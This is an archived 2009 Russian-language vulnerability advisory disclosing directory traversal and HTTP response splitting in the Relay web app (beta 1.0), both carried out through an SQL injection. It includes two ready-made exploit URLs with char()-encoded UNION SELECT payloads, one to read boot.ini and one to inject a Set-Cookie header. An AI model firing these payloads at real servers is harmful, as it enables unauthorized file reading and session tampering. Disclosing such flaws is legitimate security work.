New vulnerabilities in Relay

2009-02-18T00:00:00
ID SECURITYVULNS:DOC:21365
Type securityvulns
Reporter Securityvulns
Modified 2009-02-18T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых уязвимостях в движке Relay. Это Directory Traversal и HTTP Response Spliting уязвимости. Обе уязвимости связаны с одной SQL Injection в Relay (http://websecurity.com.ua/1485/). Данные две атаки проводятся через SQL инъекцию.

Эти уязвимости представляют собой необычное использование SQL Injection и с подобными уязвимостями я периодически сталкиваюсь. В частности, данные Directory Traversal атаки отличаются от считывания файлов средствами СУБД (как LOAD_FILE в MySQL) в том, что они не зависят от прав пользователя на работу с файловой системой. И поэтому данные атаки могут использоваться для обхода ограничения на работу с файловой системой в СУБД.

Directory Traversal (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,char(98,111,111,116,46,105,110,105),char(99,58),char(47,102,105,108,101,115,116,111,114,101),1,1,1,1,1,1,1,1,1,1

Для получения файла boot.ini. На других ОС можно получить другие файлы.

HTTP Response Spliting (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,1,1,char(47,102,105,108,101,115,116,111,114,101),char(10,83,101,116,45,67,111,111,107,105,101,58,32,110,97,109,101,61,118,97,108,117,101,59,32,112,97,116,104,61,47,59),1,1,1,1,1,1,1,1,1

Для установки кукиса.

Уязвима версия Relay beta 1.0 (и предыдущие версии).

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/2890/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua